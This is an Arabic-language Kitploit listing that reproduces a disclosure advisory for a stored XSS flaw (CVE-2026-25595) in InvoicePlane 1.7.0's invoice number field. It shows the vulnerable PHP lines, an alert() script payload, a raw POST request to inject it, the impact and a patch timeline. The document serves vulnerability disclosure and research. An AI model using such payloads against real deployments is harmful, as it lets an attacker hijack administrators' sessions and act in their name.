Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25595 — # ثغرة XSS مخزنة في InvoicePlane 1.7.0 عبر حقل رقم الفاتورة غير المعقّم، مع إثبات المفهوم وتفاصيل المعالجة. | Kitploit
أدوات/GitHubGitHub/lagathos/cve-2026-25595
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويبالأوراق والأبحاثالتعلم والتعليم
GitHublagathos/cve-2026-25595

CVE-2026-25595

# ثغرة XSS مخزنة في InvoicePlane 1.7.0 عبر حقل رقم الفاتورة غير المعقّم، مع إثبات المفهوم وتفاصيل المعالجة.

عرض المستودع
12منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-25595 — تخزين XSS عبر رقم الفاتورة في InvoicePlane 1.7.0

الثغرة: تخزين البرمجة النصية عبر المواقع (XSS) عبر حقل رقم الفاتورة

المنتج: InvoicePlane

الإصدار المتأثر: 1.7.0 (وعلى الأرجح الإصدارات السابقة)

الخطورة: متوسطة

درجة CVSS 3.1: 4.8 (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N)

CWE: CWE-79: عدم تحييد المدخلات بشكل صحيح أثناء توليد صفحة الويب

اكتشفها: Leonidas Agathos

تاريخ التقرير: 2026-01-31


الوصف

يقبل حقل invoice_number في نموذج الفاتورة أي إدخال دون تعقيم. يتم تخزين القيمة وعرضها بدون ترميز في عدة مواضع: عنوان صفحة عرض الفاتورة، وحقل إدخال رقم الفاتورة، وودجت الفواتير الأخيرة في لوحة التحكم. يتم تنفيذ الحمولة كلما قام أي مسؤول بعرض الفاتورة المتأثرة أو زيارة لوحة التحكم.

الملفات المعرضة للخطر:

  • application/modules/invoices/views/view.php:247
  • application/modules/invoices/views/view.php:494
  • application/modules/dashboard/views/index.php:233
// view.php - Line 247
<?php echo trans('invoice') . ' ' . ($invoice->invoice_number ? '#' .
$invoice->invoice_number : trans('id') . ': ' . $invoice->invoice_id); ?>

// view.php - Line 494
value="<?php echo $invoice->invoice_number; ?>"

// dashboard/index.php - Line 233
<?php echo anchor('invoices/view/' . $invoice->invoice_id, ($invoice->invoice_number
    ? $invoice->invoice_number : $invoice->invoice_id)); ?>

إثبات المفهوم

الخطوة 1 — حقن الحمولة في رقم الفاتورة

أنشئ أو عدّل فاتورة على /index.php/invoices/form/{id} واضبط رقم الفاتورة على:

<script>alert("XSS in Invoices")</script>

الطلب:

POST /index.php/invoices/ajax/save HTTP/1.1
Host: 172.25.0.12
Content-Type: application/x-www-form-urlencoded

invoice_number=<script>alert("XSS+in+Invoices")</script>&invoice_id=22&...

الخطوة 1 - حقن حمولة XSS في حقل رقم الفاتورة عبر Burp Suite

الخطوة 2 — تشغيل XSS

انتقل إلى /index.php/invoices/view/{id} أو /index.php/dashboard. يتم تنفيذ الحمولة عند تحميل الصفحة.

الخطوة 2 - تنفيذ XSS عند عرض حالة الفاتورة


التأثير

يتم تنفيذ الحمولة في متصفح أي مسؤول يعرض الفاتورة المتأثرة أو يزور لوحة التحكم. وهذا يتيح اختطاف الجلسة (إذا لم تكن ملفات تعريف الارتباط HttpOnly)، وسرقة رموز CSRF، وتنفيذ إجراءات بهوية الضحية.


الجدول الزمني

التاريخالحدث
2026-01-30اكتشاف الثغرة
2026-01-31تطوير إثبات المفهوم
2026-01-31إخطار البائع
2026-02-04إقرار البائع
2026-02-04إصدار التصحيح
2026-02-05الكشف العام

المراجع

  • CWE-79
  • OWASP: البرمجة النصية عبر المواقع (XSS)
  • CVE-2026-25595

إخلاء المسؤولية

تم اكتشاف هذه الثغرة أثناء بحث أمني مستقل. يتم توفير جميع المعلومات strictly لأغراض تعليمية وبحثية ودفاعية لمساعدة البائع والمجتمع الأمني في فهم المشكلة ومعالجتها. أي استخدام ضار لهذه المعلومات محظور تمامًا.

تنزيل الأداة